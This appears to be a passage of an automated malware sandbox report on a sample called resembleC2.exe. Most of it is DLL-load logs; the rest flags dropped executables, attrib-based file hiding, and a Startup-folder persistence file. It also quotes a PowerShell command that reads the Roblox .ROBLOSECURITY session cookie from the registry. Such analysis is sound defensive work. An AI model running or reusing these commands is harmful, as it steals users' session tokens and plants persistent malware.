                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Users\user\Desktop\resembleC2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: resembleC2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: resembleC2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            barindex
                            Suspicious powershell command line found
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                            Source: MoonHub.exe.0.drStatic PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                            Source: C:\Users\user\Desktop\resembleC2.exeCode function: 0_2_00007FF848E900BD pushad ; iretd 0_2_00007FF848E900C1
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeCode function: 2_2_00007FF848E500BD pushad ; iretd 2_2_00007FF848E500C1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848EA6F9F push esi; iretd 5_2_00007FF848EA6FA7
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848E900BD pushad ; iretd 5_2_00007FF848E900C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848D4D2A5 pushad ; iretd 11_2_00007FF848D4D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848E600BD pushad ; iretd 11_2_00007FF848E600C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F32316 push 8B485F94h; iretd 11_2_00007FF848F3231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FF848E700BD pushad ; iretd 15_2_00007FF848E700C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF848E60928 push E958D61Ch; ret 17_2_00007FF848E60909
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF848E600BD pushad ; iretd 17_2_00007FF848E600C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF848E608BD push E958D61Ch; ret 17_2_00007FF848E60909
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848E86387 push esp; retf 19_2_00007FF848E86388
                            Source: resembleC2.exeStatic PE information: section name: .text entropy: 7.96053442320482

                            Persistence and Installation Behavior

                            barindex
                            Drops PE files with a suspicious file extension
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scrJump to dropped file
                            Uses attrib.exe to hide files
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\MoonHub.exe"
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scrJump to dropped file
                            Source: C:\Users\user\Desktop\resembleC2.exeFile created: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeJump to dropped file
                            Source: C:\Users\user\Desktop\resembleC2.exeFile created: C:\Users\user\AppData\Local\Temp\MoonHub.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scrJump to dropped file

                            Boot Survival

                            barindex
                            Drops PE files to the startup folder
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scrJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\gqnbO.scrJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\gqnbO.scrJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
